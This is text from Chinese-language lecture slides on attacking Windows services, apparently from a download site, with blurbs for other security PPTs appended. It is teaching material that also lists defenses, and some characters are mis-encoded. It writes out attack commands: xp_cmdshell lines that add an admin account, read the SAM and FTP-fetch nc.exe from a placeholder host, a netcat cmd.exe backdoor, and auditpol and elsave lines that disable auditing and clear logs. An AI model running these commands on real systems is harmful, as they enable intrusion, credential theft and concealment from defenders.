滲透代碼編寫代價并非所有滲透代碼都會公開滲透代碼(特別是0day)存在重要價值獲取到的滲透代碼并非所有情況都適用目標系統(tǒng)操作系統(tǒng)平臺差異，語種差異→用于覆蓋的ret值差異著名滲透代碼資源: milw0rm， bid， metasploit， packetstorm， FrSIRT(not free)… 如何對特定目標進行遠程滲透測試? 滲透測試選擇特定目標存在安全漏洞對應的滲透代碼遠程滲透: 安全漏洞可通過網絡服務進行利用想拿到shell: 安全漏洞后果為遠程執(zhí)行代碼了解滲透代碼和攻擊目標軟件環(huán)境的匹配性攻擊目標軟件環(huán)境: 操作系統(tǒng)版本、語種、網絡服務版本， … 滲透代碼支持范圍只支持/測試過哪些目標環(huán)境自己擴展?jié)B透代碼所支持的范圍: 進階課程<緩沖區(qū)溢出和Shellcode> 進行實際滲透測試實驗享受成功的喜悅直面失敗的郁悶，找出問題并解決: 從腳本小子到技術高手的必經之路 RPC服務最普遍的模式和執(zhí)行是開放式軟件基礎的分布式計算環(huán)境（DCE） MS RPC 與其兼容攻擊Windows RPC服務 MS RPC服務 TCP 135 RPC本身漏洞: MS07-029、MS04-012、MS03-039、MS03-026、… 利用RPC服務利用漏洞: MS04-011、… SMB 協(xié)議 SMB(Server Message Block)通信協(xié)議 1987年制定，作為Microsoft網絡的通訊協(xié)議。 SMB使用了NetBIOS的API接口 一個開放性的協(xié)議，允許協(xié)議擴展變得更大而且復雜大約65個最上層的作業(yè)，而每個作業(yè)都超過120個函數(shù)，甚至Windows NT也沒有全部支持到，微軟把 SMB 改名為 CIFS(Common Internet File System)。 SMB協(xié)議是基于TCP， 端口使用為139，445 攻擊Windows SMB服務 SMB服務TCP 139/445 SMB本身漏洞: MS08-063、MS07-063、MS05-027 利用SMB服務利用漏洞: 非常多即插即用服務: MS07-019、MS05-047、MS05-039 活動目錄服務: MS08-060、MS07-039  MS DTC MS DTC(Distributed Transaction Coordinator) 微軟分布式傳輸協(xié)調程序調用系統(tǒng)Microsoft Personal Web Server和Microsoft SQL Server 該服務用于管理多個服務器攻擊MSDTC服務 MSDTC服務TCP 1025 MS05-051 IIS基礎 Windows 攻擊場景演示配置 Nessus 掃描靶機通過Metasploit 攻擊MS03-026 漏洞，獲得遠程訪問權在攻擊機上運行Metasploit ， 可以查找到攻擊漏洞MS03-026 的exploit (windows / dcerpc / ms03_026_dcom) 以及一個可用的payload (generic / shell_reverse_tcp)。其中，該payload 的作用是讓靶機返回一個命令行。在攻擊機上鍵入以下命令，對靶機進行攻擊。 攻擊成功后獲得了靶機的一個命令行。編寫FTP批處理命令，下載本地攻擊文件獲得了靶機的命令行后，先在C盤創(chuàng)建一個文件夾hidennc，這是存放后門創(chuàng)建所需文件的文件夾。 執(zhí)行完上述命令后，可以在C盤hidennc文件夾下面看到命令列表command.txt，以及從FTP服務器下載的三個文件。使用netcat添加命令行后門 Netcat是一個功能強大的工具，但大小僅為60KB，所以被譽為瑞士軍刀。Netcat可以通過若干選項的組合，達到創(chuàng)建后門的效果。一個可行的方案為添加注冊表自啟動項使得后門開機自啟動從FTP服務器下載的三個文件中，有個一名為AddReg.bat。這個批命令程序修改了注冊表的啟動項，使得靶機在開機階段自動運行netcat創(chuàng)建的后門。其中注冊表的啟動項為 AddReg.bat的內容為使用reg命令(1) AddReg.bat的內容為使用reg命令(2) 運行完AddReg.bat，靶機的注冊表啟動項被修改使用AFXRootkit隱藏后門進程、文件、注冊表項當hidennc下面出現(xiàn)hook.dll文件時，后門隱藏成功。使用netcat連接后門，執(zhí)行指定攻擊命令 IIS基礎 IIS (Intenet Information Services， Internet信息服務) 微軟在Windows服務器操作系統(tǒng)中集成的Web/FTP/Email/NNTP網絡服務 HTTP: 基于文本的Web應用協(xié)議 CGI (common gateway interface) 給HTTP請求加上動態(tài)能力，生成相應動態(tài)頁面 CGI程序在服務器端被調用執(zhí)行，反饋動態(tài)執(zhí)行結果 ASP (Active Server Pages) VBScript等腳本語言編寫克服CGI效率低下，由服務器解釋執(zhí)行 ISAPI 因特網服務器應用編程接口通過ISAPI動態(tài)鏈接庫擴展IIS本身功能` 各種版本安全性 IIS的發(fā)展伴隨著安全漏洞；隨著IIS 6.0的發(fā)布，這種情況有所好轉。 在低于6.0的版本中，其用戶權限是系統(tǒng)用戶；而在IIS 6.0中，引入了網絡服務帳戶，這是一個限制用戶。這樣，即使服務遭到破壞，也不會造成系統(tǒng)的癱瘓。 IIS進程模型-IIS6之前 IIS進程(inetinfo.exe)運行在LocalSystem帳戶環(huán)境靜態(tài)內容請求: IIS進程為來自因特網匿名用戶創(chuàng)建一個臨時用戶帳戶并提供服務: IUSER_MACHINENAME帳戶 ASP/ISAPI內容請求 IIS4: ISAPI都以LocalSystem身份運行在inetinfo進程內 IIS5: OOP(進程外)模式， ISAPI以IWAM_MACHINENAME身份(Guests用戶組)運行在dllhost.exe進程 IIS進程模型-IIS6 IIS6進程模型 HTTP監(jiān)聽進程(listener， HTTP.sys): Windows內核模式TCP/IP協(xié)議棧工作進程(worker): 用戶模式，負責處理各個HTTP請求用到的ISAPI/API腳本和COM組件均運行在負責具體處理這一請求的工作進程 IIS中的FTP/NNTP/SMTP仍由inetinfo進程負責處理 IIS的工作流程 HTTP.SYS 一個內核模式網絡驅動程序。從結構上來講，HTTP.SYS是位于TCPIP.SYS之上的。一個請求首先由TCPIP.SYS處理，然后才轉發(fā)到HTTP.SYS上；同理，該請求被Web應用程序處理后作為響應返回時則是先到達HTTP.SYS在轉發(fā)到TCPIP.SYS最后到達客戶端瀏覽器。 TCPIP.SYS和HTTP.SYS都處于內核模式下。 HTTP.SYS功能特點(1) 監(jiān)聽用戶（來自于TCPIP.SYS）的HTTP請求。 驗證HTTP請求。 URL和Header長度等如果驗證沒有通過則直接返回否則將WEB請求放到適當請求隊 列中，并對其進行排隊。 HTTP.SYS功能特點(2) 路由HTTP請求到正確的WEB應用程序池。 HTTP.SYS中維護著一個從URL到WEB應用程序池的對應關系路由表（映射表），所以HTTP.SYS可以迅速將WEB請求轉發(fā)到web應用程序。如果WEB請求沒找到相應的映射，則返回404錯誤，即常見的那個并不雅觀的頁面。也可以自己畫一個漂亮的將這個頁面覆蓋掉。安全性有嗎？ HTTP.SYS功能特點(3) 緩存web應用程序對于該請求的響應結果。當同一請求被頻繁訪問時可以不必轉發(fā)到Web應用程序，直接從此緩存中將結果返回給用戶，大大提高了其響應速度。 實現(xiàn)比如連接限制、連接超時、消息隊列長度限制以及IIS寬帶限制等控制。 WEB應用程序池 WWW Admin Service (WAS) 一個管理和監(jiān)視工作進程的組件，位于它宿主在SveHost.exe中，運行在用戶模式下。當運行IIS的InetInfo.exe服務啟動后，WAS服務(SvcHost.exe)也隨之啟動。此時WAS從InetInfo的MeteBase中讀取配置信息并且初始化HTTP.SYS中的Namespace路由表(Namespace mapper)，HTTP.SYS通過路由表中的數(shù)據(jù)條目來判定Web請求的URL所對應的應用程序池。此時，HTTP.SYS就會向WEB應用程序池發(fā)出啟動工作進程的指令。。 工作進程(W3WP.EXE) 一個用戶模式下負責處理WEB請求的程序，如處理返回靜態(tài)頁的請求，調用ISAPI擴展或ISAPI篩選器，運行CGI(Common Gateway Interface)。工作進程接收來自HTTP.SYS的WEB請求和向HTTP.SYS發(fā)送該請求的WEB響應。同時也會運行WEB應用程序代碼，比如Asp.net Application和XML Web Service。工作進程主要通過程序集W3Core.DLL來實現(xiàn)所有WEB請求的處理邏輯。 WEB請求的整體流程步驟1 HTTP.SYS收到來自客戶端瀏覽器的WEB請求后，判斷請求的類型（HTTP或HTTPS），如果請求類型為HTTPS，HTTP.SYS會把這個請求放置到LSASS.EXE中的SSL隊列。對于SSL請求，HTTPFilter會執(zhí)行下面的步驟： 1) 監(jiān)聽被添加到SSL隊列的請求 2) 從SSL隊列中取出請求 3) 通過SSL解密來自HTTP.SYS的請求 4) 將解密后的請求返回給HTTP.SYS等待處理。步驟2 HTTP.SYS判斷請求的有效性。如果請求無效，則會直接返回400的錯誤頁至客戶端；如果請求有效，HTTP.SYS會檢查在Response Cache是否已經存在針對該請求的響應。 步驟3 HTTP.SYS檢查Response Cache： 1) 如果響應存在，則立即返回響應而不必將請求轉發(fā)到用戶模式下的工作進程處理。 2) 如果響應不存在，HTTP.SYS會根據(jù)namespace Map映射表來判定將該請求放到哪個應用程序池對應的隊列中，然后將請求放入此隊列。 3) 如果沒找到該應用程序池對應的隊列，或者這個隊列已經滿了，HTTP.SYS會返回一個503的錯誤頁給客戶端。步驟4 當請求放置到隊列后，HTTP.SYS會查看有沒有有效的且可以啟動的工作進程，如果沒有，HTTP.SYS會告訴WAS(svchost.exe)啟動一個工作進程(w3wp.exe)。 步驟5 啟動工作進程過程中會在啟動工作進程的過程中加載相應的ISAPI（非托管代碼）以及CLR（托管代碼）、創(chuàng)建應用程序域等操作。然后從HTTP.SYS的請求隊列中取出該web請求進行相應的處理。 步驟6 將根據(jù)請求得到的web響應結果返回給HTTP.SYS并指示HTTP.SYS是否將該響應緩存到Response Cache。步驟7 HTTP.SYS判斷響應類型(HTTP或HTTPS)，如果是HTTPS類型的響應，HTTP.SYS就會將請求放到HTTP SSL(HTTPFilter)的隊列中。對于SSL響應，即HTTPS類型的響應，HTTP SSL(HTTPFilter)會按以下步驟執(zhí)行： 1) 監(jiān)聽放入SSL隊列的響應 2) 取出放入SSL隊列的響應 3) 通過SSL加密響應 4) 將加密后的響應返回給HTTP.SYS 步驟8 HTTP.SYS將響應結果返回給客戶端并記錄針對該響應的請求（如果可以記錄的話）。如果有相同請求進來的話，會直接將其響應結果從Response Cache中去出來返回給客戶端，加快WEB請求的響應速度。攻擊Windows因特網服務: IIS IIS6之前曾是臭名昭著充斥安全漏洞進攻路線：信息泄漏、目錄遍歷、緩沖區(qū)溢出信息泄漏：MS01-004， MS00-006， MS00-058， WebDAV Search， … 目錄遍歷：古老技術../ IIS 2.0， Unicode編碼， MS00-086/MS01-026(綠盟)， … 緩沖區(qū)溢出：MS04-011， MS04-036， … IIS6推出后安全性得到大幅提升，仍存安全漏洞 MS08-006， MS07-041 IIS7.0的漏洞公告 IIS7.5的漏洞公告 IIS攻擊手段通用防范措施及時打系統(tǒng)補丁禁用用不著的ISAPI功能擴展模塊和過濾器單獨文件卷上部署虛擬根目錄使用NTFS文件系統(tǒng)禁用不必要的服務根據(jù)MS提供的IIS安全核對清單(Check List) 利用IIS Lockdown等增強IIS服務安全性使用Web服務器安全評估工具了解和修補安全威脅攻擊MS SQL Server SQL Server信息收集端口掃描: TCP 1433端口 SQLPing: SQL服務器名稱/實例名稱/版本號/端口號/命名管道 SQL Server黑客工具和技術基本SQL查詢工具: Query Analyzer， osql命令行 SQL口令破解: sqldict， sqlbf， sqlpoke 嗅探SQL Server口令字: SQL Server明文傳輸口令字(XOR編碼) Web服務器源代碼泄漏: 泄漏連接字符串(包含口令字) 攻擊已知SQL Server漏洞 SQL注入攻擊已知SQL Server漏洞 SQL Server 2K解析服務緩沖區(qū)溢出漏洞 David Litchfield， MS02-039 2003年1月: SQL Slammer蠕蟲基于UDP， 376字節(jié)單數(shù)據(jù)包: 集成目標地址生成，漏洞攻擊，自身傳播等模塊第一個帶寬限制型蠕蟲，10分鐘掃遍幾乎攻陷全部存有漏洞主機，75K臺主機受感染擴展存儲過程輸入?yún)��?shù)分析漏洞: MS00-092 存儲過程權限漏洞: MS00-048 SQL查詢?yōu)E用漏洞: MS00-014 特權提升漏洞: MS08-040 MS SQL Server 2008 R2 for 32-bit Systems 利用SQL擴展存儲過程操縱目標擴展存儲過程(extended stored procedure， XP) 黑客最青睞的SQL Server XP: xp_cmdshell SQL Server運行在LocalSystem帳戶環(huán)境下: 最高權限，沒有什么事是它不能做的！利用SQL擴展存儲過程操作目標系統(tǒng)添加Admin帳戶: xp_cmdshell „net user found stone /ADD‟ xp_cmdshell „net localgroup /ADD Administrators found‟ 讀取Administrator帳戶口令密文: Administrator無法訪問 xp_regread „HKEY_LOCAL_MACHINE‟， „SECURITY\SAM\Domains\Account\Users\000001F4‟，‟F‟ 利用SQL擴展存儲過程操縱目標利用SQL擴展存儲過程上傳后門 EXEC xp_cmdshell „echo open xxx.xxx.xxx.xxx > ftptemp‟ EXEC xp_cmdshell „echo user anonymous xxx@xx.com >> ftptemp‟ EXEC xp_cmdshell „echo bin >> ftptemp‟ EXEC xp_cmdshell „echo get nc.exe >> ftptemp‟ EXEC xp_cmdshell „echo bye >> ftptemp‟ EXEC xp_cmdshell „ftp -n –s:ftptemp‟ EXEC xp_cmdshell „erase ftptemp‟ EXEC xp_cmdshell „start nc -L -d -p 2002 -e cmd.exe‟ nc -vv xxx.xxx.xxx.xxx 2002 獲得遠程訪問shell MS SQL Server防范措施發(fā)現(xiàn)網絡上的所有SQL Server SQLPing， SQL Scan(MS)等阻斷不可信客戶對SQL Server端口的訪問配置防火墻規(guī)則及時打好補丁 Windows Update并不具備自動搜索和實施SQL Server補丁的功能網管應關注SQL Server的Service Pack和Hotfix，并進行升級和補丁修補強口令字，特別是sa帳戶盡可能使用Windows Only身份驗證模式 MS Terminal Services(遠程桌面) 服務器遠程管理桌面: 桌面操作系統(tǒng)Win2K Pro， WinXP 終端服務: Win2K中稱為應用服務器遠程桌面協(xié)議 RDP (Remote Desktop Protocol): TCP 3389 客戶端 RDC (Remote Desktop Connection) Run “mstsc” 遠程桌面Web連接(RDWC: Remote Desktop Web Connection)： ActiveX/COM對象，嵌入瀏覽器的客戶程序，通過RDP連接服務器攻擊“遠程桌面” 尋找和探查遠程桌面通過搜索引擎查找RDWC: TSWeb\default.htm 通過TCP 3389端口尋找遠程桌面服務非標準端口的遠程桌面查找 ProbeTS， TSEnum， 終端服務管理器攻擊遠程桌面猜測口令字 TSGrinder2， TSCrack 竊聽攻擊 RDP加密實現(xiàn)缺陷MS02-051 “遠程桌面”基本安全原則使用強口令字設置帳戶鎖定閾值(雖然對遠程桌面交互式登錄無效)，設置登錄警告升級/跟進補丁服務器操作系統(tǒng): 升級至Windows Server 2008 桌面操作系統(tǒng): 必要時才開放“遠程協(xié)助” “Remote Desktop Users”用戶組使用組策略管理RDU用戶組權限軟件限制策略（限制特定用戶組能夠使用哪些應用程序）終端服務的嚴格配置 Windows本地攻擊 Windows本地攻擊本地權限提升(特權提升) 破解本地安全漏洞破解口令字竊取敏感信息掩蹤滅跡遠程控制和后門破解漏洞進行本地權限提升 Guest→Administrator getadmin系列針對NT4的權限提升攻擊工具基本技術：“DLL注入” 假造LPC端口請求: MS00-003 命名管道預知: MS00-053 NetDDE服務漏洞: MS01-007 Windows調試器攻擊: MS03-013 破解漏洞進行本地權限提升 DLL 注入（1） DLL：動態(tài)鏈接庫封裝大量函數(shù)，實現(xiàn)模塊化的工程管理。提供API接口，調用前需要事先引用、聲明，也可以動態(tài)的加載。需要載入DLL，獲取函數(shù)地址然后才能調用。 惡意代碼編寫質量的好壞取決于其隱藏程度。如果是EXE文件，則將會產生一個進程，很容易發(fā)現(xiàn)。可以選擇為 DLL 文件，DLL 文件加載到進程的地址空間中，不會有進程名。 DLL文件如果不被進程加載又如何在進程中？強制讓某進程加載DLL文件，即創(chuàng)建遠程線程將DLL注入到某個指定的進程中。 DLL注入（2）把DLL “寫入”另一個程序的運行空間去。 EXE在啟動時需要加載很多DLL，內存中這些DLL和EXE所在的地址空間是不一樣的，而只有加載進一個DLL，系統(tǒng)才會為這個DLL分配地址和空間。實際上，強行讓另一個EXE載入（裝載）這個DLL。 DLL注入（3） DLL注入的目的主要是通過一個外部的、第三方的手段來讓另一個程序執(zhí)行作者并沒有意圖加入EXE的功能。外掛、程序修改器、曾經的殺毒軟件木馬、病毒 正常使用的DLL注入有什么好處？作為一個外掛（外部掛接）程序來修改其他程序的內容。作為監(jiān)控程序監(jiān)控另一個程序的運行情況。 DLL注入（4）惡意使用的DLL注入有什么好處？一旦注入正常程序，例如svchost.exe，殺毒軟件監(jiān)控到的惡意操作的發(fā)起者就可能是這個正常程序，有白名單的殺毒軟件可能會放行。用戶看到正常程序正在進行可疑操作的時候有可能會點擊殺毒軟件的放行從而讓病毒得逞。 Windows自帶的防火墻并不會阻止可信程序發(fā)起的網絡連接，而這個可信程序僅僅是通過文件名來判斷的。 DLL注入的方法（1） HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs里面的DLL會被加載到幾乎每個進程中，只要進程加載user32.dll，這里面的DLL就會同時附載到那個進程上。 user32.dll是Windows用戶API接口的鏈接庫(Windows User API Client DLL)，幾乎每個程序都會用到它。 從Vista起，這個鍵值由于安全問題，默認是被禁止的。 Windows 7起，包括Windows 8 R2，這個鍵值被RequireSignedAppInit_DLLs 取代，雖然加載DLL，但是只能加載帶有數(shù)字簽名的DLL。 DLL注入的方法（2）進程使用CreateRemoteThread和類似的函數(shù)則可在運行時注入DLL。 1、獲取目標進程的句柄。 2、在目標進程中分配一定內存，把要注入的DLL名稱寫進去。當然，這一步也可能省略，如果加載一個名為？32.dll的dll，就不必寫入內存，也可以繞過部分監(jiān)控軟件。 3、在目標進程中建立一個新線程，然后起始地址設置為LoadLibrary的地址，參數(shù)設置為剛才寫入的那個dll名稱。也可以直接在線程開始寫入可執(zhí)行代碼。 4、注入成功，現(xiàn)在操作系統(tǒng)就會調用DLLMain函數(shù)了。 DLL注入的方法（3）使用SetWindowsHookEx之類的Windows鉤子調用。 使用調試功能（Debugging）暫停所有線程，然后劫持一個存在的線程，再用它執(zhí)行注入代碼。 使用Windows程序中的字符限制漏洞來利用LoadLibrary函數(shù)加載DLL。獲取口令字密文口令字密文位置 NT4之前：SAM安全帳戶管理器 %systemroot%\system32\config\SAM 操作系統(tǒng)運行期間鎖定，即使Admin帳戶也不能隨意查看和修改 Windows 2000/XP/2003: 活動目錄 %windir%\WindowsDS\ntds.dit 默認大小10MB，加密格式獲取口令字密文的基本套路另一操作系統(tǒng)啟動－拷貝密文文件：物理訪問硬盤修復工具包rdisk創(chuàng)建SAM備份文件拷貝: rdisk /s- 竊聽Windows系統(tǒng)身份驗證過程(網絡監(jiān)聽LanMan密文) 直接從SAM文件或活動目錄直接提取口令字密文直接提取口令字密文 pwdump (Jeremy Allison): 最早針對NT4 SAM直接提取口令字密文要求admin權限 NT4 SP2增強策略: SYSKEY機制 pwdump2(Todd Sabin): DLL注入方法將本身代碼加載到另一高優(yōu)先級進程空間要求admin權限， samdump.dll庫文件 Windows 2000/XP/2003: 活動目錄 pwdump2的改進版本 pwdump3e改進版本: 通過SMB遠程提取口令字密文破解口令字 L0phtcrack工具多種導入SAM數(shù)據(jù)方式: 本地注冊表、原始SAM文件、SAM備份文件、網絡監(jiān)聽口令字密文、L0phtcrack數(shù)據(jù)文件、pwdumpX輸出文件字典破解、蠻力破解、混合式破解分布式破解: 并行破解 LanMan密文破解: 最早被破解 John the Ripper 免費破解Unix/Linux、Window LanMan口令字缺陷：只能破解LanMan密文竊取敏感信息-登錄口令 LSADump LSA Secrets將登錄其他系統(tǒng)的資料未經加密存放在本地系統(tǒng). 某些服務帳戶的明文口令字最新10位用戶的口令字密文緩存 FTP、Web用戶明文口令字 Remote Access Service撥號帳戶名字和口令字用來訪問域控制器的計算機帳戶口令字 lsadump2利用DLL注入提取LSA Secrets內容 查看登錄信息緩存區(qū) 10個最近登錄用戶的口令字密文: HKLM\SECURITY\CACHE\NL$n CacheDump， cachebf 竊取敏感信息-用戶數(shù)據(jù)用戶文件－文件搜索 find工具：find “password”*.txt findstr grep: Windows Resource Kit 用戶輸入鍵擊記錄器: keylogger (IKS， …) 抓屏監(jiān)控: 網銀木馬 GINA木馬: 木馬化登錄界面，竊取登錄用戶密碼 FakeGINA 用戶程序信息：軟件License， QQ/網絡游戲“信封”， … 盜號木馬網絡交換信息：明文密碼等 snort/Snifferpro/tshark， fsniff/dsnif Windows掩蹤滅跡關閉審計功能查看目標系統(tǒng)的審計策略管理審計功能: Resource Kit中的auditpol auditpol /disable 干完壞事后auditpol /enable恢復審計功能清理事件日志 elsave工具－清除事件日志 elsave -s \\HOST -l “Security”–C Windows掩蹤滅跡(2) 隱藏文件隱藏屬性: attrib +h

NTFS文件流隱藏：cp HOSTFILE: 提�。篶p HOSTFILE: 隱藏文件防范措施修改資源瀏覽器配置，查看所有資源 Windows遠程控制和后門命令行遠程控制 TCP/IP瑞士軍刀-netcat 服務器端(目標主機): nc -L -d -e cmd.exe -p PORT 客戶端(攻擊機): nc HOST PORT 通過SMB服務-psexec psexec \\HOST -u admin_user -p pass comm 圖形化遠程控制 Windows遠程桌面-TCP 3389 VNC: 服務器端WinVNC， 服務器端VNCViewer 商業(yè)軟件: RemoteAdmin， PCAnywhere 國產軟件: 冰河、灰鴿子 Windows遠程控制和后門端口重定向-繞過防火墻過濾 fpipe: TCP源端口轉發(fā)/重定向工具 fpipe -v -l 53 -r 23 HOST 將TCP 53端口上的通信轉發(fā)給23端口telnet 可以指定源端口后門藏身之地: ASEP－自啟動擴展點注冊表啟動項 HKLM\SOFTWARE\Microsoft\Window\CurrentVersion\Run， RunOnce … 啟動子目錄 … UMU紅軟基地

網絡信息安全論文PPT作品：這是一個關于網絡信息安全論文PPT作品，主要介紹網絡安全？誰關注安全？網絡信息安全主講：唐屹 博士 教授辦公室：行政西前座440室電話：13808876629 誰關注安全？政府？誰關注安全？機構？誰關注安全？個人？誰關注安全？大家都關注！區(qū)別只是角度不一樣！我們這個課程也關注！希望通過72學時，能夠關注并了解基本的網絡安全攻防技術 基本的系統(tǒng)安全攻防技術 基本的Web安全攻防技術當然，沒有攻擊，就沒有防御。要了解網絡攻防技術攻是第一位的你不會攻擊，并不意味著別人不會攻擊你不知道攻擊的途徑，你又怎么知道如何防御呢？但是，法律，法規(guī)…… 教學方式與考試要求課堂教學信息安全技術實驗項目杜絕抄襲成績計算 70%考試成績 20%信息安全技術實驗 10%考勤參考資料雖然有本很實用的教材，但依然需要與時俱進，歡迎點擊下載網絡信息安全論文PPT作品哦。

網絡信息安全的重要性PPT作品：這是一個關于網絡信息安全的重要性PPT作品，主要介紹了什么是信息、什么是網絡、什么是網絡信息安全、學科內容、授課內容等內容。網絡信息安全緒論：什么是網絡信息安全本節(jié)內容什么是信息什么是網絡什么是網絡信息安全學科內容授課內容什么是信息科學家說：信息是不確定性的減少，是負熵老百姓說：信息是讓你知道些什么的東西安全專家說：信息是一種資產，它意味著一種風險老百姓說：不怕賊偷，就怕賊惦記信息內容和信息載體信息內容和信息載體的關系，好比靈魂和肉體的關系同一個內容，可以用多種載體承載不同的內容，可以用同一載體承載信息可以被—— 創(chuàng)建輸入存儲輸出傳輸（發(fā)送，接收，截�。┨幚恚ň幋a，解碼，計算）銷毀 一個例子: S先生和P先生的故事一個例子: S先生和P先生的故事信息的要害是改變知識狀態(tài)什么是網絡網絡確保信息按需有序流動的基礎設施傳輸網絡基礎電信網、基礎廣電網互聯(lián)網絡互聯(lián)網（因特網）、內聯(lián)網、外聯(lián)網人際網絡關系網、銷售網、間諜網什么是安全 Security: 信息的安全 Safety: 物理的安全 Security的含義在有敵人（Enemy）/對手（Adversary）/含敵意的主體（Hostile Agent）存在的網絡空間中，確保己方的信息、信息系統(tǒng)和通信不受竊取和破壞，按照需要對敵方的信息、信息系統(tǒng)和通信進行竊取和破壞的“機制”（Mechanism）什么是網絡信息安全在網絡環(huán)境下信息資產（信息、信息系統(tǒng)、通信）的可能面臨的風險的評估、防范、應對、化解措施。技術措施（采用特定功能的設備或系統(tǒng)）管理措施（法律、規(guī)章制度、檢查）三分技術七分管理網絡信息安全的要害網絡信息安全的要害就是防止通過改變知識狀態(tài)來造成不希望的后果對信息進行竊取，會使竊取者知道信息擁有者不希望他知道的事情對信息進行破壞，會使信息的擁有者失去對信息的擁有，不再知道他本來知道的事情背景網絡的普及對網絡的依賴加深攻擊的門檻降低攻擊資源的廣泛存在實施攻擊的難度大大降低維護國家主權和社會穩(wěn)定、打擊網上犯罪、引導青少年健康上網（過濾與監(jiān)控）網絡信息資源的綜合利用（情報獲取與分析）網絡信息對抗和網絡信息戰(zhàn)網絡信息安全的CIA模型，歡迎點擊下載網絡信息安全的重要性PPT作品哦。

企業(yè)網絡信息安全的重要性PPT：這是一個關于企業(yè)網絡信息安全的重要性PPT，主要介紹了企業(yè)信息網絡安全問題概述、企業(yè)信息網絡安全分析、市場競爭需要加強信息安全管理、如何解決企業(yè)信息網絡安全問題、重點要解決的問題、內網安全監(jiān)控軟件介紹、產品種類及服務介紹等內容。如何加強 企業(yè)信息網絡安全管理 融信科技 程孝龍合作方：公安部第三研究所信息網絡安全研發(fā)中心國家反計算機入侵和防病毒研究中心一、企業(yè)信息網絡安全問題概述 信息是一種資源�？蛻粜畔ⅰ⒇攧招畔�、人事信息和技術信息等對一個企業(yè)來說是十分重要的。信息與物質和能量一起構成企業(yè)生存和發(fā)展的基礎。電腦網絡、辦公自動化、電子政務帶來高效、方便。也帶來信息安全問題。 在處理、使用和保存信息的過程中存在那些不可忽略的安全問題？例如：對內部網絡的電腦上網、聊天、游戲等行為難以管理。對機密文件上傳下載等管理漏洞較大。經常存在惡意代碼、病毒和黑客的攻擊。不能及時進行漏洞掃描和補丁管理。二、企業(yè)信息網絡安全分析 隨之而來的網絡攻擊、數(shù)據(jù)泄密、客戶資料被竊、辦公室變成網上游樂場、計算機黑客或病毒入侵公司，以及電郵泛濫等問題和事件時有發(fā)生。那么如何才能充分滿足對機密數(shù)據(jù)的安全防護和電腦非法行為的監(jiān)控與管理？ 目前我國有幾十萬個政府機關和大中型企業(yè)都在思考，如何才能很好地解決內網的安全監(jiān)控管理問題。尤其象各級黨政機關、軍隊、金融、公安、電信、民航、鐵路、交通、大中型企業(yè)等用戶的需求更為迫切，歡迎點擊下載企業(yè)網絡信息安全的重要性PPT哦。